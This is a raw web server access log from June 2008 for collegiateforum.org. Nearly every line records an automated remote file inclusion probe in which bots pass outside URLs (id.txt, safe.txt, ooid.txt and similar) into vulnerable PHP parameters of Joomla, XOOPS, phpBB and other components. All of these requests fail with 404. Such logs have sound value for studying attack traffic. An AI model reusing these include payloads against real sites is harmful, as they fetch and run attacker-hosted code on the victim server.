64.38.46.234 - - [22/Jun/2008:19:42:08 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:08 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:09 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:18 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:18 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:18 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:25 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:25 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:42:25 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
213.146.230.100 - - [22/Jun/2008:19:42:34 -0700] "GET /logs/access.log//cal/tools/send_reminders.php?includedir=http://carefreebabes.net./ttt_admin/turbo/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:19:43:09 -0700] "GET //mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:44:48 -0700] "GET /logs/access_080107.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:44:49 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:44:55 -0700] "GET /logs/access_080121.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:05 -0700] "GET /logs/access.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:06 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:24 -0700] "GET /logs/access_080107.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:24 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:24 -0700] "GET /logs/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:45:30 -0700] "GET /logs/access_080121.log/index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:45:50 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:45:50 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:45:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:45:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:46:20 -0700] "GET /logs/access.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:46:21 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:46:21 -0700] "GET /logs/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:46:21 -0700] "GET /main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:47:30 -0700] "GET /index.php?go=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.6.22.163 - - [22/Jun/2008:19:47:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
67.195.58.156 - - [22/Jun/2008:19:47:34 -0700] "GET /logs/access.log HTTP/1.0" 200 82313 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
209.62.24.242 - - [22/Jun/2008:19:48:02 -0700] "GET /logs/access_071224.log/errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.62.24.242 - - [22/Jun/2008:19:48:02 -0700] "GET /errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.62.24.242 - - [22/Jun/2008:19:48:02 -0700] "GET /logs/errors.php?error=http://www.dutadewata.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:50:08 -0700] "GET /logs/access_071231.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:50:08 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:50:09 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:51:05 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:51:59 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:51:59 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:52:09 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:19:52:09 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:52:39 -0700] "GET /logs/access_080609.log//include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:52:39 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.13.231.31 - - [22/Jun/2008:19:52:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.pousadapedradaconcha.com.br/html/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:19:53:07 -0700] "GET /logs/access_080107.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:19:53:53 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:19:54:29 -0700] "GET /logs/access_080324.log//mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:19:54:29 -0700] "GET /logs//mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
216.117.129.77 - - [22/Jun/2008:19:54:56 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.117.129.77 - - [22/Jun/2008:19:54:56 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
216.117.129.77 - - [22/Jun/2008:19:54:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:19:55:31 -0700] "GET /logs/access_071210.log//mvcw.php?step=1&vwar_root=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:19:57:19 -0700] "GET /logs/access_080107.log//spaw/spaw_control.class.php?spaw_root=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:19:57:19 -0700] "GET /logs//spaw/spaw_control.class.php?spaw_root=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:19:57:19 -0700] "GET //spaw/spaw_control.class.php?spaw_root=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.6.22.159 - - [22/Jun/2008:19:58:20 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
67.195.58.151 - - [22/Jun/2008:19:58:21 -0700] "GET /logs/access_080107.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:19:58:58 -0700] "GET /logs/access_071224.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:19:58:58 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:19:58:58 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:19:59:51 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:19:59:51 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
206.123.114.66 - - [22/Jun/2008:19:59:51 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
216.117.129.77 - - [22/Jun/2008:20:01:08 -0700] "GET /logs/access_071224.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://academic.kru.ac.th/sida6_4.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:01:50 -0700] "GET /lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:01:51 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
213.35.225.138 - - [22/Jun/2008:20:02:48 -0700] "GET /logs/access_071224.log/errors.php?error=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.35.225.138 - - [22/Jun/2008:20:02:48 -0700] "GET /errors.php?error=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
213.35.225.138 - - [22/Jun/2008:20:02:49 -0700] "GET /logs/errors.php?error=http://netsaita.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:03:24 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:03:25 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
64.38.46.234 - - [22/Jun/2008:20:03:25 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
87.230.19.114 - - [22/Jun/2008:20:04:12 -0700] "GET /logs/access_080421.log/main.php?pagina=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.72.122.182 - - [22/Jun/2008:20:05:16 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:20:05:18 -0700] "GET /aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.31.206.138 - - [22/Jun/2008:20:09:41 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:20:10:44 -0700] "GET /logs/access.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:20:10:44 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:20:10:44 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:29 -0700] "GET /logs/access_080107.log//magazine.php?inc=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:30 -0700] "GET //magazine.php?inc=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:31 -0700] "GET /logs//magazine.php?inc=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:35 -0700] "GET /logs/access.log//main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:36 -0700] "GET //main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:12:36 -0700] "GET /logs//main.php?x=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.55.179.18 - - [22/Jun/2008:20:12:45 -0700] "GET /logs/access_080121.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:13:47 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:13:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sistemas.unilestemg.br/ping/a.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:13:50 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
12.158.188.13 - - [22/Jun/2008:20:13:50 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
222.124.143.236 - - [22/Jun/2008:20:14:02 -0700] "GET /logs/access_071224.log//magazine.php?inc=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:20:15:17 -0700] "GET /logs/access_071210.log/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
207.7.108.203 - - [22/Jun/2008:20:15:18 -0700] "GET /logs/aedatingCMS.php?dir%5Binc%5D=http://tonight-is-the-night.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
64.72.122.182 - - [22/Jun/2008:20:15:42 -0700] "GET /logs/access_080121.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.72.122.182 - - [22/Jun/2008:20:15:42 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:16:01 -0700] "GET /logs/access_071224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:16:02 -0700] "GET /logs/access_071224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:16:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:16:13 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.234.133.173 - - [22/Jun/2008:20:17:51 -0700] "GET /logs/access_071224.log/upgrade_album.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:19:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
168.243.203.247 - - [22/Jun/2008:20:19:10 -0700] "GET /logs/access_071231.log/lostpasswd.php?env[include_prefix]=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
87.106.18.76 - - [22/Jun/2008:20:19:12 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.72.122.182 - - [22/Jun/2008:20:19:23 -0700] "GET /logs/access_071224.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
74.208.46.46 - - [22/Jun/2008:20:19:27 -0700] "GET /logs/access_080414.log//orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://focuslifechoice.com/blog3/data/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
